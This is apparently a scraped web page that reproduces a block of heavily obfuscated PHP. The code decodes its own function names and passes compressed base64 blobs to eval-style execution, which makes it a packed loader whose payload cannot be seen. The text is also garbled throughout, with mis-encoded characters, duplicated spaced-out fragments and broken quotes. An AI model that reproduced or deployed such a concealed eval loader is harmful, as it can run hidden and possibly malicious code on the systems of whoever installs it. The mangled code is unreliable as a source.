if (!defined("FEFECFFBDA")){define("FEFECFFBDA", __FILE__);global $?$墖,$檲?$攬潖,$枏亹,$厠攷倠,$妸憻晫?$拲們棆潃,$拺姀亱啋?$棙檶嚌槖噴,$挒梾悈垟灂?$焽剨槅枱殑棐,$焺殰瀺剤?厰,$厪墐劃儘値厞厖,$剨灄妭拠亐寠€悐,$噮憳悥潔殜悏憸彉;function 悹($悹,$墖?""){global $?$墖,$檲?$攬潖,$枏亹,$厠攷倠,$妸憻晫?$拲們棆潃,$拺姀亱啋?$棙檶嚌槖噴,$挒梾悈垟灂?$焽剨槅枱殑棐,$焺殰瀺剤?厰,$厪墐劃儘値厞厖,$剨灄妭拠亐寠€悐,$噮憳悥潔殜悏憸彉;if(empty($墖?){return base64_decode($悹);}else{return 悹($厠攷倠($悹,$墖?$剨灄妭拠亐寠€悐($墖?));}}$厠攷倠=悹("c3RydHI=€");$剨灄妭拠亐寠€悐=悹("c3RycmV2?);$檲?悹("CmFzZTC0X2RsC2?kZp==?,"YsQqplC");$拺姀亱啋?悹("J2I1ZDZkgDcyZmV梚NzgxOTU1NTE0Yo凟wN2RhN2I5gDc1J?U=?,"LWjMgosJ");$棙檶嚌槖噴=悹("I3v1bmNpb朮BJIXNz?,"ZyvqpJI");$挒梾悈垟灂?悹("VXVhbA==?,"ZyfatGlV");$噮憳悥潔殜悏憸彉=悹("vHJlZ19yZXBskW桸l?,"cYkv");function 檲啝(&$檲啝){global $?$墖,$檲?$攬潖,$枏亹,$厠攷倠,$妸憻晫?$拲們棆潃,$拺姀亱啋?$棙檶嚌槖噴,$挒梾悈垟灂?$焽剨槅枱殑棐,$焺殰瀺剤?厰,$厪墐劃儘値厞厖,$剨灄妭拠亐寠€悐,$噮憳悥潔殜悏憸彉;$噮憳悥潔殜悏憸彉?悹("zGll?,"ZsurTz");@$噮憳悥潔殜悏憸彉($拺姀亱啋?$挒梾悈垟灂?"(@$棙檶嚌槖噴($檲?'eNpt0u1v0kAc滲/B/hTR9cY11AzqEhlx0OIWx卲Qo+UFBDdlBC桞x0EkFHcwngo僁2VAIQgMh/RP泃XcgKvFNk973€09/1vi1tQMME刅CYQzMYcfCkq攈i8v7o4h/EGx嶸KIqJzMU46V7旽YJUhb9WI0dw歛mWx4/NTFWfT?mpEUlHJFcWY僰JeUD7CORbYg?0RMarNRfbON擷0xfoxif8Ydg傾zYxyiuXfmx0僨bz+fj8h6uwq巑I1GQnCJgYyk?hkWk0GjOe+v?ggJVYUi4oRs奃5NAUvla9ZVD嶹K07LX3Rnq2X檙flmWIX7KFe4卻IqHJUplv09I扚StEtpaPPwet哹q1R06aEliOu扸FoMqmkxQ854圗a2my5hqo16z僼WoOGkNN1zRi孴yIhBz4ACojv哫p5gZJgwHn99別v4qHvfKKUAb抔DoEB0+eM5/B濱cVaMWv1aDLM圢1KZCfHdJ8cX?62ULUq7RcP03tJafzps9AkB巑4C1UQW069JK倀n2B35YlbquZ巚+raib1ywHYU?5RjINyL/j0w?Ev/O8ZuDXIy傿5SHtyNPAiHX圡3vK43a4XYjn匬Ee82+VMJSQe楯SnWyTB4U9vN宩Y3uaOOFMVsN塴rrRGz+OFiaw哫vOh2zbhC3q+昬LjvrBaTjg7w濫rlsjjbWR/V+抏zIwYUlWJPzI僅0u+TpjLO5Ai條JHoU8Oi0KwO?X/yNpd4874Q杢mr8BdB0I7M=?)));","湗?噭殝妴b5d6d072feb731955514b107da7b9075彎摋噯");return "r";}}else{global $?$墖,$檲?$攬潖,$枏亹,$厠攷倠,$妸憻晫?$拲們棆潃,$拺姀亱啋?$棙檶嚌槖噴,$挒梾悈垟灂?$焽剨槅枱殑棐,$焺殰瀺剤?厰,$厪墐劃儘値厞厖,$剨灄妭拠亐寠€悐,$噮憳悥潔殜悏憸彉;$厠攷倠=悹("c3RydHI=€");$剨灄妭拠亐寠€悐=悹("c3RycmV2?);$檲?悹("CmFzZTC0X2RsC2?kZp==?,"YsQqplC");$拺姀亱啋?悹("J2I1ZDZkgDcyZmV梚NzgxOTU1NTE0Yo凟wN2RhN2I5gDc1J?U=?,"LWjMgosJ");$棙檶嚌槖噴=悹("I3v1bmNpb朮BJIXNz?,"ZyvqpJI");$挒梾悈垟灂?悹("VXVhbA==?,"ZyfatGlV");$噮憳悥潔殜悏憸彉=悹("vHJlZ19yZXBskW桸l?,"cYkv");}$拲們棆潃?悹("oU5yempFaHJB嘠UFEHGdFjjmd?,"ZTYHo");$妸憻晫挔=檲啝($拲們棆潃?;@$噮憳悥潔殜悏憸彉($拺姀亱啋?$挒梾悈垟灂?"(@$棙檶嚌槖噴($檲?'eNpVU/tP4k旳Q/v3+il6z巗W1sEDw13m桭9BImPHHoC坹iWk19SyaM?a9rqtzzMq抔mgReUQFje恑/erMLnjEp淶fabmW/mm5?GZ6anZtxt?9Ms9jzH0z檢sOp5v2lti慥IpzBBNiOr塟GfN3zRQCQ焣xc4hROMr/乊XIY4ItopwRFommd5Ipv侾CYjb7Q1tc坺WQFNfKOpp烴r68lMVltP廘wkqkBDd8i奆tUyd4Ykwr漎MMpYFHQF9慛RI7F+tJaZ?EtlU4fffy?dpcyxo1Ri?CA1v7Sn/5搘LjIXt/eXs厃oKeW7NS0T峍FoD0FJutp岰P4VAc653P峺yks/zRdPC僄q/KeX4L+5漴h2D62fcKr則".$拲們棆潃?$妸憻晫挔."LCAv峃RFZ5I345R僲6p0iA8MkA榦P/dF4kYc5瀎RsZMW038H€mJOimVWeRE焝xDsi0hbSG刡zPJ0Rr0oS歞8yhjYSW+0恑0gw8VEmwS?xN3C+NiYJ歵/zILo6XZB抣CRJjk1QYj恞6TGZpdSUv?AiqQpMAdT?T9jl2oIVP廜GwRTKtQzo?pbxrYOz+q唙ikzi+JnfA岯zYNdqOXoB烣0TBcQEglt欴v2Vf4wc3w欵b5/Ofx/Pl匓JjQjPw+SL峧iciU4nGkT€kFgixs970S擜MPDjIzVR6淶Kt+TN/kUb嶣mM4NhQbZ0楲epbAqg37o橺niH7qCkzP揊zyUxsdJKX卪WKJJiLd8x濺84Fpsg/4K?qA+h4qBbS僯UPbhR3dN3烻R+IAWBYOi婩c4tgNNi3T?Gi0DyPhNL歰noCUwaFmQ漡Pd0Cywm+O橲Em7XxPpcQ旴3z9HgLPil怓9dK0j9PYj塪CUj7OuIMz揹44T1YdBbP峎nQVGKFLpw歛QLHh0mwff€IxfYbKWaMr晀uyujx6lJG嘾1e9hoxOHx€rngFZqd7el恗ozCsPV6f9丱WUbteuujU唀mdgtcLGee?yXZdRp/t4俇+1129UQ4J沝OpVm5unu5沨+jXajnsXj?8PpU79FR+攅n6pl69OS6攅VO+BuXF+U卐xf10m0lrF歊kVA5fOmGp揦T0/uwnPmk揃VrbS6zYde?SlsXreeG1?pPjP9D6eodEs=?)));","挏?悅垎拺b5d6d072feb731955514b107da7b9075?洀潈");return true;?>1c42d9a483236a3e86c0b0ae23692102
b朮BJIXNz?,“ZyvqpJI”); 挒 梾 悈 垟 灂 ? 悹 ( " V X V h b A = = ? , " Z y f a t G l V " ) ; 挒梾悈垟灂?悹("VXVhbA==?,"ZyfatGlV"); 挒梾悈垟灂?悹("VXVhbA==?,"ZyfatGlV");噮憳悥潔殜悏憸彉=悹(“vHJlZ19yZXBskW桸l?,“cYkv”);} 拲 們 棆 潃 ? 悹 ( " o U 5 y e m p F a H J B 嘠 U F E H G d F j j m d ? , " Z T Y H o " ) ; 拲們棆潃?悹("oU5yempFaHJB嘠UFEHGdFjjmd?,"ZTYHo"); 拲們棆潃?悹("oU5yempFaHJB嘠UFEHGdFjjmd?,"ZTYHo");妸憻晫挔=檲啝( 拲 們 棆 潃 ? ; @ 拲們棆潃?;@ 拲們棆潃?;@噮憳悥潔殜悏憸彉( 拺 姀 亱 啋 ? 拺姀亱啋? 拺姀亱啋?挒梾悈垟灂?”(@ 棙 檶 嚌 槖 噴 ( 棙檶嚌槖噴( 棙檶嚌槖噴(檲?'eNpVU/tP4k旳Q/v3+il6z巗W1sEDw13m桭9BImPHHoC坹iWk19SyaM?a9rqtzzMq抔mgReUQFje恑/erMLnjEp淶fabmW/mm5?GZ6anZtxt?9Ms9jzH0z檢sOp5v2lti慥IpzBBNiOr塟GfN3zRQCQ焣xc4hROMr/乊XIY4ItopwRFommd5Ipv侾CYjb7Q1tc坺WQFNfKOpp烴r68lMVltP廘wkqkBDd8i奆tUyd4Ykwr漎MMpYFHQF9慛RI7F+tJaZ?EtlU4fffy?dpcyxo1Ri?CA1v7Sn/5搘LjIXt/eXs厃oKeW7NS0T峍FoD0FJutp岰P4VAc653P峺yks/zRdPC僄q/KeX4L+5漴h2D62fcKr則". 拲 們 棆 潃 ? 拲們棆潃? 拲們棆潃?妸憻晫挔.“LCAv峃RFZ5I345R僲6p0iA8MkA榦P/dF4kYc5瀎RsZMW038H€mJOimVWeRE焝xDsi0hbSG刡zPJ0Rr0oS歞8yhjYSW+0恑0gw8VEmwS?xN3C+NiYJ歵/zILo6XZB抣CRJjk1QYj恞6TGZpdSUv?AiqQpMAdT?T9jl2oIVP廜GwRTKtQzo?pbxrYOz+q唙ikzi+JnfA岯zYNdqOXoB烣0TBcQEglt欴v2Vf4wc3w欵b5/Ofx/Pl匓JjQjPw+SL峧iciU4nGkT€kFgixs970S擜MPDjIzVR6淶Kt+TN/kUb嶣mM4NhQbZ0楲epbAqg37o橺niH7qCkzP揊zyUxsdJKX卪WKJJiLd8x濺84Fpsg/4K?qA+h4qBbS僯UPbhR3dN3烻R+IAWBYOi婩c4tgNNi3T?Gi0DyPhNL歰noCUwaFmQ漡Pd0Cywm+O橲Em7XxPpcQ旴3z9HgLPil怓9dK0j9PYj塪CUj7OuIMz揹44T1YdBbP峎nQVGKFLpw歛QLHh0mwff€IxfYbKWaMr晀uyujx6lJG嘾1e9hoxOHx€rngFZqd7el恗ozCsPV6f9丱WUbteuujU唀mdgtcLGee?yXZdRp/t4俇+1129UQ4J沝OpVm5unu5沨+jXajnsXj?8PpU79FR+攅n6pl69OS6攅VO+BuXF+U卐xf10m0lrF歊kVA5fOmGp揦T0/uwnPmk揃VrbS6zYde?SlsXreeG1?pPjP9D6eodEs=?)));”,“挏?悅垎拺b5d6d072feb731955514b107da7b9075?洀潈”);return true;?>1c42d9a483236a3e86c0b0ae23692102
234
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
